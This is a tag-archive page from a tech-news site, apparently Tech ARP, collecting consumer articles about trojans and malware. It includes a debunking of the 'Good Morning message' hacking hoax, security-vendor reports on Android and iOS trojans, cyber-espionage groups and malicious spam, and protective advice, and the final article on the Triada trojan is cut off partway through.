Tag Archives: Trojan

Are Hackers Using Good Morning Messages To Hack You?

Can Hackers Use Good Morning Greetings To Hack You?

Can hackers use Good Morning videos, pictures and messages to hack your devices, and steal your data?

Find out what is happening, and what the FACTS really are!


Claim : Hackers Are Using Good Morning Messages To Hack You!

This post about Chinese hackers using Good Morning videos, pictures and messages to hack your devices, keeps going viral on social media and WhatsApp.

It’s a long message, so just skip to the next section for the facts!

Dear friends, please delete all welcome photos and videos in Good Morning format and the like. Read below the article to the end, which will be clear why I ask about it. From now on I will only send personally prepared greetings.

Read it all !!! Send this message urgently to as many friends as you can to stop the invasion.

Olga Nikolaevna Lawyer: Caution:


For those who like to send Good Morning pictures! Good day! Good evening!

Do not send these “good” messages.

Today, Shanghai China International News sent SOS to all subscribers (this is the third reminder) that experts recommend: please do not send good morning, good night, pictures and videos,.


Truth : Good Morning Greetings Not Being Used To Hack You!

Many of us get spammed with Good Morning or Good Night messages every day from family and friends.

While they often clog up Facebook, Telegram and WhatsApp groups, they really do NOT allow hackers to hack your devices.

Here are the reasons why Good Morning messages are very irritating, but harmless…

Fact #1 : Shanghai China International News Does Not Exist

The news organisation that was claimed to be the source of this warning – Shanghai China International News –  does not exist!

Fact #2 : Good Morning Greetings Not Created By Hackers

Hackers (from China or anywhere else) have better things to do than to create these Good Morning pictures and videos.

They are mostly created by websites and social media influencers for people to share and attract new followers.

Fact #3 : No Fraud Involving Good Morning Messages

There has been no known fraud involving Good Morning or even Good Night messages, videos or pictures.

Certainly, half a million victims of such a scam would have made front page news. Yet there is not a single report on even one case…. because it never happened.

Fact #4 : Image-Based Malware Is Possible, But…

Digital steganography is a method by which secret messages and other data can be hidden in digital files, like a photo or a video, or even a music file.

It is also possible to embed malicious code within a Good Morning photo, but it won’t be a full-fledged malware that can execute by itself.

At most, it can be used to hide the malware payload from antivirus scanners, which is pretty clever to be honest…

Fact #5 : Image-Based Malware Requires User Action

In January 2019, cybercriminals created an online advertisement with a script that appears innocuous and would pass any malware check.

However, the image itself has an “almost white” rectangle that is recognised by the script, triggering it to redirect the user to the cybercriminals’ website.

Once there, the victim is tricked into installing a Trojan disguised as an Adobe Flash Player update.

Such a clever way to bypass malware checks, but even so, this image-based malware requires user action.

You cannot get infected by the Trojan if you practice good “Internet hygiene” by not downloading or installing anything from unknown websites.

Fact #6 : Malicious Code Executes Immediately

If you accidentally download and trigger malware, it will execute immediately. It won’t wait, as the hoax message claims.

Deleting Good Morning or Good Night photos or videos will free up storage space in your phone, but it won’t prevent any malware from executing.

There is really no reason for malware to wait before it infects your devices. Waiting will only increase the risk of detection.

Whether the malware serves to take over your device, steal your information or encrypt it for ransom, it pays to do it at the first opportunity.

Now that you know the facts, please SHARE this article with your family and friends!


Please Support My Work!

Support my work through a bank transfer /  PayPal / credit card!

Name : Adrian Wong
Bank Transfer : CIMB 7064555917 (Swift Code : CIBBMYKL)
Credit Card / Paypal : https://paypal.me/techarp

Dr. Adrian Wong has been writing about tech and science since 1997, even publishing a book with Prentice Hall called Breaking Through The BIOS Barrier (ISBN 978-0131455368) while in medical school.

He continues to devote countless hours every day writing about tech, medicine and science, in his pursuit of facts in a post-truth world.


Recommended Reading

Go Back To > Cybersecurity | SoftwareTech ARP


Support Tech ARP!

Please support us by visiting our sponsors, participating in the Tech ARP Forums, or donating to our fund. Thank you!

Malware Alert : How Shopper Takes Over Android Phones!

An Android malware called Shopper is actively taking over smartphones, to post fake reviews on Google Play.. and worse!

Find out what’s going on, and how to prevent your smartphone from being hijacked by Shopper!


Shopper : What Does It Do?

Shopper (Trojan-Dropper.AndroidOS.Shopper.a) is an Android trojan that uses the Google Accessibility Service to take over your smartphone.

It is not yet known how users are being infected, but researchers suspect that it may be downloaded through fraudulent ads, or third-party app stores when they try to download legitimate apps.

The malware masks itself as a system application, and uses a system icon called ConfigAPKs to hide itself from the user.

After the user unlocks the screen, the Shopper trojan launches and gathers information about the device, which is then sent to the attacker’s servers.

The attacker’s servers will then send commands to the Shopper trojan to execute one or more of these actions :

  • Check the rights to use the Accessibility Service. If permission is not granted, it will send a phishing request until it gets it
  • Turn off Google Play Protect, a safety check on Google Play Store apps before they’re downloaded
  • Post fake positive app reviews in Google Play, for those apps

  • Open links received from the remote server in an invisible window
  • Download and install advertised apps from Google Play Store
  • Download and install apps from the Apkpure third-party app store
  • Show ads when the smartphone screen is unlocked
  • Create labels to advertised ads in the app menu
  • Replace the labels of your installed apps with labels of advertised websites
  • Use your Google or Facebook account to register on popular shopping and entertainment apps, like AliExpress, Lazada, Zamora, Shein, Joom, Likee and Alibaba


Shopper : Who’s Getting Infected?

Right now, Kaspersky researchers say that it is most widespread in Russia (28.46%), following by Brazil (18.70%) and India (14.23%) :


Shopper : How To Block It?

To reduce the risk of being infected by Trojan-Dropper.AndroidOS.Shopper.a, take these actions :

  • Do NOT install apps from untrusted sources
  • Block the installation of apps from unknown sources in your smartphone settings
  • Be wary of apps that require the use of the Google Accessibility Service, especially if the app is not meant to offer accessibility features to the disabled
  • Always check application permissions to see what your installed apps are allowed to do
  • Use a reliable mobile security solution


Suggested Reading

Go Back To > Cybersecurity | Home


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

84% of New PCs with Pirated Software Infected with Malware!

A recent Microsoft PC test purchase sweep revealed that 84% of new PCs sold in Asia with pirated software were infected with malware. Here are the details of their report…


The Microsoft Asia PC Test Purchase Sweep

The Microsoft Asia PC Test Purchase Sweep examined a total of 166 new PCs from 9 markets across Asia – India, Indonesia, Korea, Malaysia, Philippines, Singapore, Taiwan, Thailand and Vietnam.

The PC samples selected were purchased from retailers that offered PCs  at much lower cost and free software bundles to lure customers. In many cases, these retailers also sold pirated software at their store.


84% of New PCs with Pirated Software Infected With Malware!

The sweep found that one of the most common practices for vendors installing pirated software on new PCs is to turn off the security features, such as anti-virus software and Windows Defender as doing this allows them to run the hack-tools needed to activate the pirated software.

However, this leaves PCs vulnerable to malware and other cyberthreats, and the buyers of these PCs may not even realize that their PC is not being protected.

The sweep also uncovered that 84%of the new PCs loaded with pirated software were infected with some type of malware, with the most common malware being :

  • Trojans are a type of malware that is employed by cybercriminals to gain remote access and control of devices, allowing them to spy on the users and steal private data. While Trojans typically depend on some form of social engineering to trick users into loading and executing them, bundling them with pirated software makes it easier for cybercriminals to compromise and control PCs.
  • Viruses are another type of malware whichcan cause infected computers to do a variety of things which are not beneficial to the PC owner, such as terminating devices’ security features, sending spam messages, and contacting remote hosts to download additional malware.

These findings are particularly concerning as customers buy PCs that offer special deals which are cheap and come with free software, not realizing the risks they may be exposing themselves to. In most cases, they may not even realize that the security features of their PCs are turned off and may fail to spot suspicious activities on their devices.

Many of these infected PCs’ users are highly susceptible to data loss, including personal documents and sensitive information such as passwords and banking details, as well as identity theft where they lose control of their social media and email accounts. Users might also experience compromised PC performance as malware, running in the background, can slow down devices.

All these factors can lead to consumers and businesses chalking up significant monetary, time and productivity losses as they work to resolve the issues.


Key Cyber-Hygiene Practices for Individuals and SMEs

The most fundamental step that users can take to safeguard themselves digitally is to always insist on buying PCs from established retailers and not ones that also sell pirated software, and ensuring they are getting genuine software. Consumers should refer to software vendors’ websites to learn how they can distinguish between genuine and pirated software.

Besides using genuine software, people can also consider and adhere to the following recommendations to better protect themselves:

  • Keep software current with the latest security patches, which are always free.
  • Follow safe Internet practices and do not visit potentially dangerous websites, such as those that offer adult content, illegal downloads, and pirated software, as well as file sharing portals.
  • Avoid using very old software which has reached its end of life and is no longer supported by the software vendor for updates and security patches.


Recommended Reading

[adrotate group=”2″]

Go Back To > Software | Home


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Kaspersky : Attackers Hiding Ztorg Trojan Inside Trojan SMS

Kaspersky Lab experts have discovered Ztorg apps on the Google Play Store that appear to show cybercriminals trying different ways to get their malware past security – in this case by installing their malicious code in stages and wrapping a Trojan SMS around an encrypted rooting Trojan.

The attackers used the Trojan SMS to make money from victims through Premium-rate SMS while they waited to execute the rooting Trojan. The apps were downloaded more than 50,000 times since mid-May, 2017, but have now been removed from Google Play.


Attackers Hiding Ztorg Trojan Inside Trojan SMS

The determination of cybercriminals to infect Android devices with Ztorg malware through the Google Play Store shows no signs of slowing down, with attackers constantly adapting their tools and techniques to avoid discovery.  In May 2017, Kaspersky Lab researchers discovered what appeared to be a standalone Ztorg variant, a Trojan SMS.

On closer inspection, it turned out to contain an encrypted Ztorg rooting Trojan. The Ztorg SMS was found in two apps, a browser and a “noise detection” application. The browser app, which was downloaded 50,000 times, was uploaded to Google Play on 15 May, and never updated – possibly because it was a test run to see if the functionality worked.

The researchers were able to make a more detailed study of the “noise detection” app, uploaded on 20 May and installed more than 10,000 times before being deleted by Google. Their analysis suggests the cybercriminals’ ultimate aim was to execute a regular version of the Ztorg Trojan.

But since they had opted for a stage-by-stage approach involving a series of clean and then malicious updates, they added some supplementary malicious functionality to make money while they were waiting to run the rooting malware.

The Ztorg SMS functionality allows the app to send premium rate SMS, delete incoming SMS and switch off sound.

The Ztorg Trojan continues to appear on the Google Play Store, accompanied by new tricks to bypass security and infect as many different Android devices and OS versions as possible. Even if a victim downloads what is clearly a clean app, there is no guarantee that it will still be clean in a few days’ time. Users, Google and security researchers need to remain vigilant at all times and to be proactive about protection,” said Roman Unuchek, Senior Malware Analyst, Kaspersky Lab.

Kaspersky Lab advises users to install a reliable security solution, such as Kaspersky Internet Security for Android (Amazon | Lazada), on their device, always check that apps have been created by a reputable developer, to keep their OS and application software up-to-date, and not to download anything that looks at all suspicious or whose source cannot be verified.

Go Back To > News | Home

[adrotate group=”1″]


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

F-Secure Explains Security as a Service (SaaS)

Security as a Service offers business stronger cybersecurity profiles

The age of information technology has brought with it many business advantages. In fact, much of the world today is still constantly adapting to ongoing advances and innovation. Borderless trade and digital economies thrive and offer business large and small endless potential.

Yet the benefits of digital comes along with an ugly side – cyberthreats. Once merely the domain of bored young tech gurus, cyberthreats today have grown to become one of the largest dangers to businesses. From malware to ransomware, cybercriminals cost organizations billions of dollars in damages and lost revenue globally.

Gone are the days where simple anti-virus platforms could protect business systems. Yet with rapidly evolving and increasingly advanced cyberthreats on the horizon, how many organizations can create and maintain teams of cybersecurity experts to defend their systems?


Focus on innovating for business objectives

According to Amit Nath, Head of Asia Pacific – Corporate Business at F-Secure, Fundamentally, operational business issues and in-house technical limitations face uphill challenges compounded by malware, trojans, phishing, social engineering, ransomware and more. These threats occur at almost every single layer of all business verticals.

Even as technical departments struggle on increasingly limited budgets to innovate within the organization to support business functions, malicious hackers are spitting out variants of their harmful code on a daily basis.

“Even a few small tweaks to change a piece of malicious code needs to be recognized in order to be defended against. Chunks of code beings transferred to unknown destinations of the Internet through the dark web further escalates the problem,” said Nath.

The most frightful thought of all now is that ‘black hats’ are catering to the uninitiated and offering for sale destructive code in ready to use formats. Almost anyone who wants to cause trouble or mount advanced cyberattacks against any organization can do so; for a price.


Fight the war with Security as a Service

Knowing that cybercriminals are now offering what is essentially Cybercrime as a Service, organizations need to recognize that this is a fight they cannot win on their own.

“We are increasingly seeing that firms fail to protect themselves properly up to the extent that many don’t even realise when breaches occur. By the time they realise it, problems are often to the extent that they have no option but to outsource ‘cures’ to specialists for exorbitant fees,” said Nath.

This results in organizations paying to maintain their own technical teams, paying for outsourcing for problem clean-ups and yet still facing the potential financial and reputational damage from data loss!

“The situation is critical. So many backdoors are left poorly or totally unguarded. With increasing data privacy laws being enforced around the world the situation looks ire for many businesses,” he said.

Business today need to recognise that failing to protect themselves is no longer an option. However, they also need to realise that they don’t have to cope with these massive barriers on their own. Security companies today offers levels of protection that even malicious hackers find daunting, so the simplest solution would be to opt for Security as a Service as the most rational route of their predicaments.


How does Security as a Service work?

[adrotate banner=”4″]

“The companies that rely on themselves very often find themselves in extremely defensive positions. It likens to an infantryman in a battle, where he sits in a foxhole and has no scouting support, simply dealing with attacks that come in one after the other. Sooner or later, the enemy will get through,” said Nath.

“We have for so many years built on the security business, evolving ahead of the threats. Our business is security and we not only deal with what we see, but work ahead to predict what we cannot see. Thanks to this mindset and capability, we are able to offer unprecedented degrees of robustness and resilience to organization,” he explained.

The path towards a safer future is a tough and long one and security-aware businesses soul adopt the right level of strategic planning. Options such a Security as a Service can offer protection not only from current, but also future threats.

“As businesses work towards digital transformation goals, they need to know that they have the option to ensure painless high-levels of security at any time, thanks to Security as a Service,” he concluded.


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participating in the Tech ARP Forums, or even donating to our fund. Any help you can render is greatly appreciated!

Kaspersky Labs: Pokémon Go Malware In Google Play

15 September 2016Kaspersky Lab experts have discovered a new Pokémon Go malware on the Google Play store: “Guide for  Pokémon Go”. This Trojan is capable of seizing root access rights on Android smartphones and using that to install/uninstall apps and display unsolicited ads. The app has been downloaded more than 500,000 times, with at least 6,000 successful infections. Kaspersky Lab has reported the Trojan to Google and the app has been removed from Google Play.


Pokémon Go Malware Found In Google Play

The global phenomenon of Pokémon Go has resulted in a growing number of related apps and, inevitably, increased interest from the cybercriminal community. Kaspersky Lab’s analysis of the “Guide for Pokémon Go” Trojan has uncovered malicious code that downloads rooting malware, securing access to the core Android OS for the purposes of app installation and removal as well as the display of advertising.

The Pokémon Go malware includes some interesting features that help it to bypass detection. For example, it doesn’t start as soon as the victim launches the app. Instead, it waits for the user to install or uninstall another app, and then checks to see whether that app runs on a real device or on a virtual machine. If it’s dealing with a device, the Trojan will wait a further two hours before starting its malicious activity.

Even then, infection is not guaranteed. After connecting with its command server and uploading details of the infected device, including country, language, device model and OS version, the Trojan will wait for a response. Only if it hears back will it proceed with further requests and the downloading, installation and implementation of additional malware modules.

This approach means that the control server can stop the attack from proceeding if it wants to – skipping those users it does not wish to target, or those which it suspects are a sandbox/virtual machine, for example. This provides an additional layer of protection for the malware.

Once rooting rights have been enabled, the Trojan will install its modules into the device’s system folders, silently installing and uninstalling other apps and displaying unsolicited ads to the user.

Kaspersky Lab analysis shows that at least one other version of the malicious Pokémon Guide app was available through Google Play in July 2016. Further, researchers have tracked back at least nine other apps infected with the same Trojan and available on Google Play Store at different times since December 2015.


Over 6,000 Successful Infections And Counting

Their data suggests that there have been just over 6,000 successful infections to date, including in Russia, India and Indonesia. However, since the Pokémon Go malware is oriented towards English-speaking users, people in such geographies, and more, are also likely to have been hit.

[adrotate banner=”4″]

“In the online world, wherever the consumers go, the cybercriminals will be quick to follow. Pokémon Go is no exception. Victims of this Trojan may, at least at first, not even notice the increase in annoying and disruptive advertising, but the long term implications of infection could be far more sinister.

If you’ve been hit, then someone else is inside your phone and has control over the OS and everything you do and store on it. Even though the app has now been removed from the store, there’s up to half a million people out there vulnerable to infection – and we hope this announcement will alert them to the need to take action,” said Roman Unuchek, Senior Malware Analyst, Kaspersky Lab.

People concerned that they may be infected with the Pokémon Go malware should scan their device with mobile antivirus. If they are infected, there are tools available to help them remove the rooting malware, which can be a complex process.

In addition, Kaspersky Lab advises users to always check that apps have been created by a reputable developer, to keep their OS and application software up-to-date, and not to download anything that looks at all suspicious or whose source cannot be verified.


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participate in the Tech ARP Forums, or even donate to our fund. Any help you can render is greatly appreciated!

F-Secure: NanHaiShu Malware Study Findings

F-Secure finds cyberattacks becoming increasingly targeted

The use of the NanHaiShu Remote Access Trojan coincides with events leading to the recent ruling in the Philippines vs. China case.

The world has been undergoing remarkable transformation due specifically to the advancement of the cyber-age. This is due to increasingly strong digital infrastructure as well as the explosion in use of digital devices and technologies. However, it is that very advancement that has opened corporates and even government around the world to heightened scrutiny from cyber criminals.

While some cyberattacks are no doubt being aimed at global supply chains, yet more are becoming very specifically targeted in purpose, being utilised by anyone ranging from hacktivists to hostile governments.

“These groups have learned the layout of the new playing field, and are getting more competent in the way they are bale to exploit the vulnerabilities that corporates and governments are exposed to, due to increasing reliance on automated and digital systems,” said Amit Nath, Head of Asia Pacific, Corporate Business, F-Secure.

Governments under seige by NanHaiShu

As a strong case example, F-Secure Labs very recently found a strain of malware that appears to be targeting parties involved in the recently decided Philippines vs. China case. This portion of the South China Sea dispute has recently been of high profile, given the favourable ruling towards the Philippines under arbitration provisions of the United Nations Convention on the Law of the Sea (UNCLOS).

The malware itself, dubbed NanHaiShu by F-Secure researchers, is a Remote Access Trojan that allows attackers to exfiltrate data from infected machines. More significantly is what the Malware represents; That geopolitics is just as relevant as ever in the face of threats related to cybersecurity.

According to Nath, the Malware associated with the incident appears to targeted organizations that are related to the case and is specifically designed to do so.

“NanHaiShu was spread using phishing emails and contained content-specific keywords that had the exact targets in mind. The objective of the Malware seemed to be to enable to designers to gain greater insight on status of the legal proceedings in the case,” said Nath.

An F-Secure study released regarding the NanHaiShu incident state that targets included the Department of Justice of the Philippines, the organizers of the Asia-Pacific Economic Cooperation (APEC) Summit and an international law firm representing one of the involved parties.

[adrotate banner=”5″]


Cybercriminals evolve, realise true value of information

Nath feels that wherever geopolitical rivalries occur today, so too are cyber exchanges increasingly prevalent. “This is especially true in cases where cyber criminals have the leverage of targeting countries that have cyberspace infrastructure but are weak on governance,” he Nath.

The technical analysis exposed the malware’s notable orientation toward code and infrastructure associated with developers in mainland China. Owing to that, and to the fact that the selection of organizations targeted for infiltration are directly relevant to topics that are considered to be of strategic national interest to the Chinese government, F-Secure researchers suspect the malware to be of Chinese origin.

Although the NanHaiSHu Malware was utilised mainly for intelligence gathering, other such Malware seldom are, and cybercriminals of today have been known to cause operational shutdowns, equipment damage, reputation damage and more.

“These criminals have advanced to the point that they are not only highly competent in terms of their technical ability, but they have even become very uch aware of the real value of their ill-gotten gains,” said Nath.

“They know exactly how to monetize what they steal, and in fact are not beyond even being able to use the information to influence business dynamics,” he said. As an example, Nath mentioned the case where market-sensitive information was stolen from more than 100 companies, to be traded or profits on the stock market.

With these examples, it is clear that cybercriminals of today have become a formidable force and it is only with the aid of highly experienced and skilled cybersecurity professionals such as F-Secure that a semblance of normalcy can be maintained.


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participate in the Tech ARP Forums, or even donate to our fund. Any help you can render is greatly appreciated!

Dropping Elephant Cyber-Espionage Group Exposed

Petaling Jaya, 8 July 2016 – In February 2016, following an alert from a partner, Kaspersky Lab’s Global Research and Analysis Team began an investigation. It quickly became clear that a threat actor, likely operating from India, was undertaking aggressive cyber-espionage activity in the Asian region, targeting multiple diplomatic and government entities with a particular focus on China and its international affairs. Having only old exploits and unremarkable tools in their arsenal, the actor also tried its luck in attacking high profile targets including some Western entities.


Dropping Elephant

The modus operandi of “Dropping Elephant” (also known as “Chinastrats”) could hardly be called sophisticated. The attackers rely heavily on social engineering and low-budget malware tools and exploits. However, this approach seems to be effective, which makes this actor a dangerous one. From November 2015 to June 2016, the actor profiled hundreds to thousands of targets all around the world. On top of this, within the first couple of months of the operation they managed to steal documents from at least a few dozen selected victims.

Tools: simple, yet effective

  • For initial target profiling, Dropping Elephant mass-mails a number of email addresses it has collected on the basis of their relevance to its goals. The spear-phishing emails sent by the attackers contain references to remote content – it is not embedded in the email itself, but downloaded from an external source. The email has no malicious payload, except a simple “ping” request that is sent to the attackers’ server if the target opens the email. This automatically sends a message which contains some basic information about the recipient: IP address, type of browser and both the device used and its location.
  • After using this simple method to filter out the most valuable targets, the attackers proceed with another, more targeted spear-phishing email. This is either a Word document with CVE-2012-0158 exploit, or PowerPoint slides with an exploit for the CVE-2014-6352 vulnerability in Microsoft Office. Both exploits are public and have been known for a long time, but are still effective.
  • Some victims are targeted by a watering hole attack: they receive a link to a website disguised as a political news portal, focused on China’s external affairs.

The majority of links on this website lead to additional content in the form of a PPS (PowerPoint Slides document) with a malicious payload inside.

Even though the vulnerabilities used in the attacks were patched by Microsoft, the attackers can still rely on a social engineering trick to compromise their targets if they ignore multiple security warnings displayed and agree to enable dangerous features of the document. The content of the malicious PPS is based on carefully chosen, genuine news articles featuring widely discussed geopolitical topics, which makes the document look more trustworthy and likely to be opened. This leads many users to become infected.

  • After the successful exploitation of the vulnerability, a range of malicious tools are installed on the victim’s machine.
  • These tools then collect and send attackers the following types of data: Word documents, Excel spreadsheets, PowerPoint presentations, PDF files, login credentials saved in the browser.

In addition to social engineering attacks and exploits for old vulnerabilities, one of the Dropping Elephant backdoors uses a C&C communication method borrowed from other threat actors: it hides the real location of the C&C server in the form of the comments to articles on legitimate public websites. This technique has previously been observed, albeit with a far more complex execution, in operations conducted by Miniduke and other threat actors. This is done in order to make investigation of the attack more complicated.

Geographical preferences

Based on the target profile created by the Kaspersky Lab researchers, Dropping Elephant is focused on two main types of organization and individuals: Chinese-based government and diplomatic entities and any individuals connected to them, as well as partners of these organizations in other countries.

In total, Kaspersky Lab experts were able to identify several hundred targets worldwide, most of which are located in China, while others were from or related to Pakistan, Sri-Lanka, Uruguay, Bangladesh, Taiwan, Australia, USA and some other countries.


There are indicators pointing to the fact that this actor operated from India however, at the same time, there is no solid proof to that a nation-state might be involved in this operation.

The analysis of activity reveals that the attackers probably operated in the time zone of either UTC+5 or UTC+6. Interestingly enough, since May 2016, Kaspersky Lab researchers have spotted a new activity pattern for the group in a new geographical area that includes Pacific Standard Time zone, corresponding – among others – to West Coast working hours in the US. This is likely to be the result of increased headcount in the Dropping Elephant team.

Despite using such simple and affordable tools and exploits, the team seem capable of retrieving valuable intelligence information, which could be the reason why the group expanded in May 2016. The expansion also suggests that it is not going to end its operations anytime soon. Organizations and individuals that match this actor’s target profile should be especially cautious. The good news is that this group hasn’t yet been spotted using really sophisticated, hard-to-detect tools. This means that their activity is relatively easy to identify. This can of course change at any time,» – said Vitaly Kamluk, Head of Research Center in APAC, GReAT, Kaspersky Lab.

[adrotate banner=”5″]

Kaspersky Lab is open to working with CERTs and law enforcement agencies of affected countries to notify the owners and mitigate the threat.

In order to protect yourself and your organization from cyber-espionage groups like Dropping Elephant, Kaspersky Lab security experts advise taking the following measures:

  • Follow the basic rules of Internet security: don’t open attachments in emails received from unknown senders and regularly update the software on your PC;
  • Use a proven security solution capable of fighting the most sophisticated cyberthreats;
  • Remember that what looks like a legitimate document could be the first stage of a targeted attack against your company. In large organizations, use proven anti targeted-attack solutions capable of spotting dangerous anomalies in the corporate networks before the malware is installed and the data is stolen;
  • The best way to keep your protection up to date is to track the evolution of targeted attack actors. Use threat intelligence services to ensure you’re aware of what new techniques attackers implement and what protection measures could make these techniques ineffective.

Kaspersky Lab solutions detect and neutralize the Dropping Elephant malware as Exploit.Win32.CVE-2012-0158;

  • Exploit.MSWord.CVE-2014-1761;
  • Trojan-Downloader.Win32.Genome;
  • HEUR:Trojan.Win32.Generic.
  • Trojan.Win32.Agent.ijfx
  • Trojan-Ransom.Win32.PolyRansom.bel
  • Trojan.Win32.Autoit.fdp

Kaspersky Lab also detects the exploits used in the documents.


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participate in the Tech ARP Forums, or even donate to our fund. Any help you can render is greatly appreciated!

Malicious Spam Emails Spike In Q1 2016

16 May 2016 – The latest Kaspersky Lab Spam and Phishing Report has discovered that although the quantity of spam emails has been decreasing, they have become more criminalized. At the same time, the level of malicious mailshots has dramatically increased – Kaspersky Lab products prevented 22,890,956 attempts to infect users via emails with malicious attachments in March 2016, twice the number of attempts reported in February 2016.

Since 2012 the level of spam in email traffic has constantly been decreasing. However, the quantity of emails with malicious attachments has increased significantly – in Q1 2016 it was 3.3 times higher than during the same period in 2015. There was also a growing amount of ransomware reported throughout the quarter. This is often propagated through emails with infected attachments – for example Word documents. The main actor on this field in Q1 was the ransomware Trojan Locky, which has been actively distributed via emails in different languages and has targeted at least 114 countries. Locky emails have contained fake information from financial institutions that have deceived users and forced them to open the harmful attachment.

Kaspersky Lab’s findings suggest that spam is becoming more popular for fraudsters to target Internet users, because web browsing is becoming safer. Almost all popular web-browser developers have now implemented security and anti-phishing protection tools, making it harder for cybercriminals to propagate their malware through infected web pages.

According to Kaspersky Lab’s Q1 report on spam and phishing the main findings for the quarter were:

  • In Q1 2016 Kaspersky Lab registered 56.3% of spam in email flow. This is 2.9 percent lower compared to the same period in 2015, when it equaled 59.2%.
  • The largest amount of spam was sent in January (59.6% in overall email traffic). This is explained by the end of the holiday season, when the flow of normal, non-spam, emails is usually low.
  • The USA retained its position as the biggest source of spam, sending 12.43% of unwanted emails. The share of the USA in this rating is slightly decreasing in comparison to Q1 2015, when it was 14.5%.
  • Other large sources of spam included Vietnam (second place with 10.3%) and India (6.16%). This is compared to the same period in 2015, when the second and third places were held by Russia (7.3%) and Ukraine (5.6%). Russia moved to seventh place this quarter with 4.9%.
  • 81.9% of spam emails in Q1 2016 were very small size – up to 2 KB, a 2.8 percentage point increase in comparison to the same quarter in 2015. For spammers, smaller emails are easier to handle in mass mailings.
  • Germany was the country most targeted by malicious mailshots, with a total share of 18.9% of Kaspersky Lab product users in the country targeted this way. Germany was followed by China (9.43%) and Brazil took third place (7.35%). For the same period in 2015, the top three countries were Great Britain (7.8%), Brazil (7.4%) and the USA (7.2%).
[adrotate banner=”5″]


Terrorism became the main topic of spam emails in Q1.

During this quarter fraudsters tried to lure users into opening malicious files, gaining their attention with emails about terrorism, a subject which is always in the news. To prevent terrorist attacks many countries have strengthened their security measures and this has therefore become a popular topic for spam emails.

Some spam fraudsters tried to convince recipients that the file attached to their spam email contained a new mobile application, which, after installation, could detect an explosive terrorist device. The email emphasized that the US Department of Defense had discovered this technology and that it was sufficiently simple and accessible. The attachment usually contained an executive file, which was detected as Trojan-Dropper.Win32.Dapato, malware that can steal personal user information, organize DDoS-attacks and install other malicious software.

Well-known Nigerian spammers also used terrorist topics in their emails. According to the Kaspersky Lab report, the quantity of these emails has increased considerably. These spammers previously preferred to send long emails with a detailed story, and links to news to make it more convincing. However, they are now only sending short messages with no detail, asking the recipients to get in touch.

“Unfortunately we are seeing our previous predictions about the criminalization of spam coming true. Fraudsters are using diverse methods to attract user attention, and to make them drop their guard. Spammers are employing a diversity of languages, social engineering methods, different types of malicious attachments, as well as the partial personalization of email text to look more convincing. The fake messages often imitate notifications from well-known organizations and services. This is raising spam to a new dangerous level.” – warns Daria Gudkova, Spam Analysis Expert, Kaspersky Lab.


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participate in the Tech ARP Forums, or even donate to our fund. Any help you can render is greatly appreciated!

AceDeceiver : First iOS Trojan Exploits Apple DRM Design

Palo Alto Networks discovered a new family of iOS malware that successfully infected non-jailbroken devices. They’ve named it “AceDeceiver”.

What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel attack vector.

AceDeceiver is the first iOS malware they’ve seen that abuses certain design flaws in Apple’s DRM protection mechanism — namely FairPlay — to install malicious apps on iOS devices regardless of whether they are jailbroken. This technique is called “FairPlay Man-In-The-Middle (MITM)” and has been used since 2013 to spread pirated iOS apps, but this is the first time they’ve seen it used to spread malware.

Note : The FairPlay MITM attack technique was also presented at the USENIX Security Symposium in 2014; however, attacks using this technique are still occurring successfully.


AceDeceiver Sneaks Into App Store

Three different iOS apps in the AceDeceiver family were uploaded to the official App Store between July 2015 and February 2016, and all of them claimed to be wallpaper apps.

These apps successfully bypassed Apple’s code review at least seven times (including the first time each was uploaded and then four rounds of code updates, which require an additional review by Apple for each instance) using a method similar to that used by ZergHelper, where the app tailors its behavior based on the physical geographic region in which it’s being executed.

In this case, AceDeceiver only displays malicious behaviors when a user is located in China, but that would be easy for the attacker to change in any time.

Apple removed these three apps from the App Store after we reported them in late February 2016. However, the attack is still viable because the FairPlay MITM attack only requires these apps to have been available in the App Store once. As long as an attacker could get a copy of authorization from Apple, the attack doesn’t require current App Store availability to spread those apps.


How AceDeceiver Works

To carry out the attack, the author created a Windows client called ”爱思助手 (Aisi Helper)” to perform the FairPlay MITM attack. Aisi Helper purports to be software that provides services for iOS devices such as system re-installation, jailbreaking, system backup, device management and system cleaning.

[adrotate banner=”5″]

But what it’s also doing is surreptitiously installing the malicious apps on any iOS device that is connected to the PC on which Aisi Helper is installed. (Of note, only the most recent app is installed on the iOS device(s) at the time of infection, not all three at the same time.) These malicious iOS apps provide a connection to a third party app store controlled by the author for user to download iOS apps or games.

It encourages users to input their Apple IDs and passwords for more features, and provided these credentials will be uploaded to AceDeceiver’s C2 server after being encrypted. We also identified some earlier versions of AceDeceiver that had enterprise certificates dated March 2015.

Go Back To > Cybersecurity | Home


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participate in the Tech ARP Forums, or even donate to our fund. Any help you can render is greatly appreciated!

Kaspersky Discovers Triada – A Mobile Trojan

4 March 2016 – Kaspersky Lab experts have detected Triada, a new Trojan targeting Android devices that can be compared to Windows-based malware in terms of its complexity. It is stealthy, modular, persistent and written by very professional cybercriminals.

Devices running the Android 4.4.4 and earlier versions of the Android OS are at greatest risk.

According to the recent Kaspersky Lab research on Mobile Virusology, nearly half of the top 20 Trojans in 2015 were malicious programs with the ability to gain super-user access rights. Super-user privileges give cybercriminals the rights to install applications on the phone without the user’s knowledge.

This type of malware propagates through applications that users download/install from untrusted sources. These apps can sometimes be found in the official Google Play app store, masquerading as a game or entertainment application. They can also be installed during an update of existing popular applications and, and are occasionally pre-installed on the mobile device. Those at greatest risk include devices running 4.4.4. and earlier versions of the Android OS.

